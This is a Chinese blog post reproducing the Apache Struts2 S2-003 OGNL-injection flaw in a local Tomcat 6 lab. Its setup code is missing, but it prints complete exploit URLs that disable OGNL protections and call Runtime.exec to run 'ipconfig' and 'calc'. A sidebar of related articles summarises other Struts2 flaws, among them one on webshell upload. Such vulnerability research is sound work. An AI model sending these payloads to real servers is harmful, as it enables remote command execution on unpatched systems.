Struts2 S2-003

最新推荐文章于 2022-08-24 09:47:45 发布
最新推荐文章于 2022-08-24 09:47:45 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rongyongfeikai2/article/details/78331970
版权
Struts2 S2-003影响的版本是低于2.0.12以下的,所以搭建的环境使用低于2.0.12的最近一次版本,2.0.11.2。

环境搭建:

1.项目结构:


2.pom.xml里的配置:


3.web.xml的配置:


4.struts.xml的配置 :

5.LoginAction.java代码:


6.index.jsp的代码:

7.welcome.jsp的代码:

注意,tomcat-7.0.78本身限定了特殊字符;要验证此漏洞,需要使用tomcat6.0。
相关说明:

简单验证一下,在index.jsp加入如下代码:

默认情况下的展示如下:

访问如下url:
http://localhost:8080/LoginAction.action?('\u0023session[\'user\']')(unused)=0wn3d
则展示如下:

下面开始想一些高危的利用方法,比如执行一些命令。
如下为打印ipconfig:
http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'ipconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))

打开计算器:
http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'calc\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)


rongyongfeikai2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
struts2 s2-045
03-22
Struts2 S2-045 是一个著名的安全漏洞,主要影响使用Apache Struts2框架开发的Web应用程序。这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行(RCE)的可能性,这使得攻击者可以完全控制受...
『Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1153
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入。
S2-003 远程代码执行漏洞
Fly_鹏程万里
12-14 1317
漏洞信息 漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-003 漏洞成因官方概述:XWork ParameterInterceptors bypass allows OGNL statement execution 漏洞影响: 环境搭建 s2-003漏洞的payload用到了特殊字符,在高版本tomcat中会失败,...
strust2_003
iteye_3762的博客
04-09 138
[code="xml"] /global.jsp /ognl.jsp /success.jsp [/code] [code="xml"] /success.jsp ...
第一个100日计划之 第9天 Struts2 003--action实现方式,以对象的方式处理表单数据
David
11-20 138
一、action实现方式 1.1 POJO的实现方式 这种方式比较简单,直接一个普通的java类,包含一个execute()方法,然后通过struts.xml的配置即可,优点是简单,不具有侵入性(继承,实现),方便移植。 PojoAction.java package com.david.struts2.action; public class PojoAction { public...
003--Struts2中struts.xml配置详解
小洋人最happy的专栏
04-04 295
上一节说完了配置文件的加载顺序,那么本节就来看一下struts.xml文件中各配置项的含义和说明。 该文件是Struts2的核心配置文件,主要用来配置Action和请求对应关系。 配置文件信息如下: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE struts PUBLIC "-//Apache So...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts s2-016 s2-017 补丁
09-27
对Struts s2-016 s2-017的官方修复建议是升级struts, 但对正在运行的系统,许多依赖包会导致运行出错, 直接更改代码是更快的选择. 本补丁是针对 struts2-core-2.0.11.jar 的修改, 把文件中 bin下的文件直接copy到 web...
Struts2 s2-061 Poc分析1
08-03
Struts2 s2-061 是一个关于 Apache Struts2 框架的安全漏洞,具体为 OGNL(Object-Graph Navigation Language)表达式注入导致的远程代码执行问题。这个漏洞(CVE-2020-17530)在2020年12月8日被公开,影响了使用...
Java三大框架SSH之Struts2_003_06:struts标签的使用、struts的form表单标签、struts标签比html标签更强大
小良的博客
02-04 114
系列文章目录 文章目录系列文章目录前言一、struts标签的使用总结: 前言 一、struts标签的使用 struts的form表单标签 我们上一篇在jsp页面加入了一个标签 现在我们复制一下这个注册页面 复制完之后,在里面加一个分割线,来和原始的html做对比 而我们所说的 struts的form表单标签 是什么意思呢? struts的from标签提供了和原始html表单几乎一至的属性 为什么要用它呢? 因为它更强大 强大之1 自动给你加冒号: 强大之2 自动给你对齐 我们查看源码,是自动给我们加
『Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-005(S2-003修复绕过)复现与浅析
Ho1aAs‘s Blog
08-24 1154
S2-005是S2-003的绕过,xwork更新到2.1.6版本;005新增了SecurityMamberAccess功能,但是可以被绕过。
003-Struts2流程
XBB的专栏
04-16 480
strus2项目运行流程
struts2_003:使 xml 文件自动提示 + struts2 运行机制
tracyqishan的专栏
09-06 278
1. 使 xml 文件在编码时给出自动提示。在 struts.xml 中     "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"     "http://struts.apache.org/dtds/struts-2.0.dtd"> 由于其获取元素地址为 URI,因此,我们需要把其 DTD 文件放在
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2894
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1392
文章目录关于<旧文系列>前言S2-059漏洞复现与分析可回显PoC漏洞修复S2-061漏洞复现与分析可回显PoC漏洞修复小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
Apache Struts2远程代码执行漏洞(s2-005)两种方法复现
HEAVEN569的博客
02-14 1364
一、漏洞简述 漏洞原理: s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL
struts2远程代码执行漏洞简要回顾
networkangle的专栏
07-15 2700
apache官方安全公告页面: http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行的漏洞有:S2-003S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,下面逐一简要说明。 一、S2-003 受影响版本:低于Struts 2.0.12
S2-005 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-11 2852
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法...
Struts2 S2-016上传webshell的需求分析
最新发布
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标服务器上安装了Struts2框架。 2. 目标服务器上存在可以上传文件的页面。 3. 目标服务器上存在可以执行上传文件的Action。 因此,攻击者需要进行以下需求分析: 1. 了解目标服务器上是否安装了Struts2框架。 2. 扫描目标服务器,查找可以上传文件的页面。 3. 分析可上传文件的页面中文件上传的代码逻辑。 4. 查找可以执行上传文件的Action。 5. 编写恶意代码,将其伪装成图片或其他常见文件格式,以绕过上传文件类型的限制。 6. 利用漏洞上传恶意代码,并在服务器上执行该代码。 需要注意的是,利用该漏洞进行攻击可能会被追究法律责任,请勿尝试非法入侵。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值